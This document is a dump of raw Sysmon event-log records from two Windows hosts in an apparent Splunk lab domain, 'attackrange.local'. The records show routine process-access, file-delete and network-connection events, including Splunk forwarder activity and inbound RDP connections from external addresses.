09:04:45.272{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048688Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.272{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048687Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.272{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048686Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.272{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-892D-6151-027A-00000000FC01}7100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048685Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.272{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-892D-6151-027A-00000000FC01}7100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048684Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.258{5EBD8912-892D-6151-027A-00000000FC01}7100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001048704Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:46.839{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048703Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:46.587{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAF9A6F54A31C6B1540DF883A18F207F,SHA256=297700EDC8D811704D22C0F4CF460E81EFABC5EDDE3507ED3BFDEEFE8537E239,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977346Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:46.070{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EEDA415F805C79F0505CAF3EC25635E,SHA256=86CC3C42F68A318850F2FC892A7DD146C34E97B731C7B221EC9E90601B1B613B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048707Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:47.604{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9D1662B5552074811679F40A035F053,SHA256=75B4F50871B572D18B1D9794EBAE3FEC678EC08884A5D3013994BCE97358709E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977348Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:44.886{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59297-false10.0.1.12-8000- 23542300x8000000000000000977347Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:47.164{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73739EFA243B79AD62DB4A06CCB1149A,SHA256=1238810A1AFE82675B7FC404F7EE899E06633399611DA10A5C64CAA2CCF3A1E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048706Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:45.577{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse39.103.226.77-60338-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048705Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:47.186{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7C2713954026AF351EFBA70BA373FD3,SHA256=5B25CA41D1F95E23B33B648B60F0C4E41C8F7DE51E113E188321430C7B534F08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048708Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:48.622{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE90C9BFA349EC14BC911EEDCF3924A9,SHA256=4A645E073367E44F2F4501694520494708CF2C511B7A768FAE65B4D2FA951D2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977350Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:45.802{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-41807-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977349Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:48.242{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B731A5DF4B39DB75F796C4AAECA4996,SHA256=9557E706EFE532B568D71C24AF74F9A23B2268FB8B7B5D1C57CCBABB15BC97BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048711Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:49.824{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80B7B7EEB20F9DDF1D502AAAF4F16C15,SHA256=082190684B001B44C30AB45AB64C12F0855CFF3B5BDEE843DFEE3D74AA198052,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048710Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:49.624{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE9821A5D5254EE2A7594A4A8BD51C03,SHA256=37C7F5F9629F030B7D7DA9441E4C96CB2A96D7ABD0F86153301C6C8340CE7E38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977351Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:49.257{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E82E6E76F0D694AA3DD35769114BBF74,SHA256=5AEFE47827E5BE77058695D98F543BEF1DAA806DB77C8BE8F21A82BAD6570639,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048709Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:46.861{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53255-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048713Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:50.670{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AC7E4DA038C1F79B1089FB9B636D6AC,SHA256=086A9053D55D3A288C06073B70884D36196B1784D1B5F3EEFBE755492AB09CD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977354Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:50.960{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D8345AD6F9FD23B2D95C34029915A2AC,SHA256=733BE51091D6D24759AA5CC8AB09BDF9D346A62D4988C82C07C6F5908F110984,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977353Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:50.960{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F35BB9A2249EF7C2D9D30728F60782C8,SHA256=473D850DCA1103F253568DF734CD53F91C446521933DD5DEB1B93BFFD1787BD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977352Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:50.382{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D358D8277359C7D8739BDC23169F70D,SHA256=66CAD8B20FEB919C93B30B43ADD730FCE4994D24B437EFB91E5DE56C96D666A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048712Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:48.703{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50248-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000977355Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:51.601{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6381182EDB9765FBFF08E5FD6B0107B,SHA256=49228599C9AEFD4C5AD6E4144F8CE830C7EBDE0ED7F3387926FEB6960EE247BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048715Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:51.685{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5A398DC174EF52A89907F3CB85D741A,SHA256=EDA9FC2C7DE7C587888926EB361A8D890B831C74D8A322B2C0F0B0E58E86FE2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048714Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:49.077{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60826-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048716Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:52.704{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1897879A2B7519F020AF2602065A34A8,SHA256=DD653EBAC9203A5375D5F9CB095BC5AF728A83182F706C7A9FD344F5A841908D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977357Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:52.996{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4301MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977356Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:52.838{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B414C1739DC95F5A5F56958D3D797A9D,SHA256=BE6AA90D7365A6E5434A9D560801C2F1C95EF2FDCF78224E07698667C078588E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048717Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:53.936{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6AF1D843D42188E5A9E858C034BDFA7,SHA256=CD9E69AD8ED37902BBCA1731C389ABD105373368AE6DAA2DD98144F2AC39C625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977358Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:53.644{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D8345AD6F9FD23B2D95C34029915A2AC,SHA256=733BE51091D6D24759AA5CC8AB09BDF9D346A62D4988C82C07C6F5908F110984,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048738Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.966{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16CB1BA7BAC82043F3CCDF6F72E04BE5,SHA256=D02906DCEB91321026EB9CB05DD01CA78C26574D8AA5E14A8796DC09BDFD8DE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048737Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.966{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79CD16E76FB6B1FB8C4718E61AE765FA,SHA256=A24868433D8276A43AAAC9F1D787D968641FDC542E88636AC93EE35EAA090418,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048736Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.935{5EBD8912-8936-6151-057A-00000000FC01}67766480C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048735Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.751{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8936-6151-057A-00000000FC01}6776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048734Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.751{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048733Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.751{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048732Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.751{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048731Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:54.751{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 